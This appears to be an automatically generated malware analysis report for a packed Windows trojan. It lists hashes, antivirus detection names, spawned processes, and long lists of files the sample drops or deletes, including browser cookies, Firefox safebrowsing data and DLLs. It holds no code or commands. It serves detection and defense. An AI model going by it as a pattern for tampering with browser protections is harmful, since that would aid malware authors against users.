Gen.Variant.Zusy.208909_adca3c78da

HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Zusy.208909 (B) (Emsisoft), Gen:Variant.Zusy.208909 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS) Behaviour: Trojan The description has been aut...
Blog rating:1 out of5 with2 ratings

Gen.Variant.Zusy.208909_adca3c78da

by malwarelabrobot on September 6th, 2017 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Zusy.208909 (B) (Emsisoft), Gen:Variant.Zusy.208909 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: adca3c78dafc4406e4d08628972e8236
SHA1: 5fcbaa44d537a621f51f4777d71669a2b0cf7570
SHA256: 0c130395adf4a164e987e01632839cdbc8b8f09270ee9d3ad253d09e724539ce
SSDeep: 24576: TZ3uo53lJmsAt7hZSwon3VwRRtWCFBJBzk7q: Thb3xAt5tWCn47
Size: 1033520 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PECompactV2X, PECompactv20, UPolyXv05_v6
Company: no certificate found
Created at: 2012-09-09 19:23:37
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:3676
adca3c78dafc4406e4d0862872e8236.exe:260

The Trojan injects its code into the following process(es):
No processes have been created.

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:3676 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\hUOtTh\adca3c78dafc4406e4d0862872e8236.exe (7948 bytes)
C:\Windows\LqYWOJJH.dll (13 bytes)

The Trojan deletes the following file(s):

C:\Windows\LqYWOJJH.dll (0 bytes)

The process adca3c78dafc4406e4d0862872e8236.exe:260 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries (600 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\r[1].json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\r[1].json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
C:\Users\Public\Desktop\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\r[2].json (1 bytes)
C:\Windows\CLOG.txt (87 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\r[1].json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk (2 bytes)
C:\Windows\PHTQYMp\WVqSMf.dll (16404 bytes)
C:\Windows\PHTQYMp\GMpkepQXi.dll (12 bytes)
C:\Windows\ovhlpnij.dll (13 bytes)
C:\Users\Public\Desktop\Mozilla Firefox.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\Favorites\Links\Web Slice Gallery.url (276 bytes)
C:\Windows\PHTQYMp\QPofTRsG.dll (992 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini (67 bytes)
C:\Windows\System32\1428b5\CDClient_EX.sys (117 bytes)
C:\Windows\PHTQYMp\oBIxFFT.tmp (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\hUOtTh\adca3c78dafc4406e4d0862872e8236.exe (35 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk (1 bytes)
C:\Windows\PHTQYMp\LNYxeOwQr.dll (264 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-trackwhite-digest256.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\40ACE2C71721D02751C14CE7231B273A0E58A842 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\7A8D3A9360CC37F0AD80962D4AEA72B6D0F0B2B3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B4F9F19B69C223FD86BA246F4F451CE4FDC81D36 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\eS-nxtWWJ1LfBWLfd096swuFjH4[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\ECE64D1A018F9023721AC8B2F25BD83AEB4E8A8C (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\fc72ORSzwyUu08nYIdyG-ygy8w8[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\svg[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\jquery.min[1].js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\_CACHE_002_ (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\78A520FE200DD59F7079043C2E4494D582DB5E27 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\AD7A5673189C3D8259E7B3FE0033E19E1674CC68 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\AllServices[1].xml (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\XJJJSX58.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\E908A39A09178150ACAC85D34DC9551A0D9AE753 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\doomed\19628 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\K3H6JGON.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-track-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\1D1FD5C43A3C9601AA6056987017F737DB8ABF7B (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-trackwhite-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\_CACHE_MAP_ (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\861A7D6C4E285B4DB10DEE7E49FD59A156C5CB40 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\9F92779292CF395AC8E7100B8583605320E370B1 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\FDGZES7U.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\2A45E92D38EFE84CD90EC2FCC468A5D490FCBD7E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-trackwhite-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\339A4E96E26DFFA4704F0AF081D2B85B12D03939 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\E347EE129B65E7092ECAFB7CF75A62752357160F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\O761920L.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\SK6RC4AQ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\7ZFPBM01.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\ya_favicon_ru[1].ico (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\PMGXNABP.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\LXL295FY.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\4D8FDF1CF46B6BD4BCA2B32F05B47E51876D05AB (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\DB35F7B5C3B638134575506C1DECC7214B0152E3 (0 bytes)
C:\Windows\PHTQYMp\GMpkepQXi.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\1CBEA138B025655D4A8BCC260B2DAC0D5EDD72D6 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\4716F9983487F717BEDB4A2344A95133803762E5 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C0F2B5902E53102766C100D0F460054A2443B217 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\8FF14B3918ED9F95C48889D4B31C7D7F6E5F0764 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\AE2CE72866097CB9D30937BE22EDFC3338CFF98D (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\NWCBOWT9.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\2559C1ED66F9553D151E2FC960388EB1E891B126 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\MG_en-us[1].xml (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\A2F1ABCE909764E5E04E373F145C9C3886BAF96B (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\870C1269620CC48AF9164CDC9EA46DA2DC0279C3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\VPSNR0J4.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\41367369B0154D1D2566CC216318C71115E089A2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\24F9514653FD834D9D33E21B4C0AECB308550A9A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\8Q2KNK5G.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\983WD333.txt (0 bytes)
C:\Windows\System32\1428b5\CDClient_EX.sys (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\GB74HSLE.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C27D7A62FCB3822B15FE7A889EAC6EBCB8E81A80 (0 bytes)
C:\Windows\PHTQYMp\LNYxeOwQr.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\f[1].txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-block-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\ACEC3E9837AFFBA2F808D2347310A61110A832A8 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\8D2B634ED057A0D2B7876CD0F9662C750C5AA2E3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\9563C38CC53D34D0B1FB8D66675A7E1BBB4A7575 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\IAU75TW2.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\8WNTYFZE.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-forbid-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\6ACB9987E5D13DDF930A0216112504F72B35A155 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\OLCWAOT0.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\B (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\C (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\D (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KK0IK9EV.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\YJCP8HIK.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\9D083EF993029DD270F9A810F6083969DA8594D3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\E6BC1B0D7B9F7B812F1C9A7542D07DACD74DF8B7 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\AW5IGQT7.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\35BB6C6081B10CDF7DB50B6EFA374FE53E7BDFF8 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\9fkhsVhseQ-JJcxiLZwCHjhHY[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\00CZ9B9Z.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\9CB1507E8150B6A3A9D726112952A7150EA6236D (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\BPMHTAIlmc5kh6Tymb1I2mmfSAc[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\ZZxR-E_UBI8_1IS7VtDkH_bgw[1].css (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\A8D8BCCCDD886569194B60234F0DADDBCE4DF5E6 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\QVWF9XLH.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\SHMEGTHE.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\379IMDJA.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\16F000C509B7DE188B56179BF7EF0DF5B0F613E8 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\watch[1].js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\832B7A4416790DB08D1CFF514ABE80568EB2A5AC (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\frequencyCap.json (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\28454981111313E6165BC0032AE7D75973DAA649 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B6BE94D0C5013A1F752DB7D7881FD3ED9E40AB2B (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\search[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\92127114B1F74C7C0CB98314AB871F3B814368AC (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\48555710E97A743C0DD66647CF47BC74B82E981F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\929BCF811537CE5A1B05BC367E7D5FCD9D1512C2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B6D901A89865039CB84FA633FA40EE7DE5D9C921 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\83936E9426867396E4A7F9EFF2AA8303FBC66493 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\FBUBDDF0.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-track-digest256.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C1C89E55A2633162B8F74F19EA5F2E0460A59A97 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\otvet.mail[1].png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\EA9A23A1084DC6272CC8A2C73BFC178501A1F9C0 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\P2Z07O4S.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\GF0JZXVN.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\GetMDRCDPOSTURL[1].aspx (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-malware-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\D464384ED883D8C895EC6569D49B7CF849603110 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\spacer[1].gif (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-forbid-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\PFR2GFQJ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\18D327979AAFFC5AA7350875BD40E2F9D986FEDF (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\0631DE882B33C8014FE49B456EC2792EEC013072 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\E6F33F9C62B1EEFC86F28D9C75EF92282FCD9C45 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\K4EMAOY7.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\thumbnails (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\0 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\1 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\0EDDF8C091E2FED62E44BEDDDC1723F5BF38FE4F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\5 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\6 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\7 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\8 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\9 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\OF9L3DR3.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\70200C713D242B945A90D91BB201696C2691D293 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-trackwhite-digest256.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\170F54EDBE19BE8676CC69B53BAC08C8932D118A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\jquery.min[1].js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\svg[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\26DCE9685ADD07D49FDFDB35AE2FD824135617AA (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\OfflineCache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\5E4954707B44E5A4B4ACF5F22B52219A1DCA477F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\52FF99030399F0A45B6C66414333C5B4FCA4216A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\_yaru.ru[1].js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\509412AB0ECB72A42520795A67ACF843FB0210E3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\ETGRPT21.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-phish-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\996E251B0D179792066F30DEB82476DF9D5E8B15 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-track-digest256.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-unwanted-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B0DEFA60F24D21925DA6AE83CB4455379305584A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\91380939B0A3A08A7837F1BA688B498ED2EC3853 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\_CACHE_001_ (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\8394A0B2D8E569F02DE6B550AF6041770722E67D (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\8694F9E3F9C503551C17EDF4F0F30B83BCDF1DCA (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-malware-simple.sbstore (0 bytes)
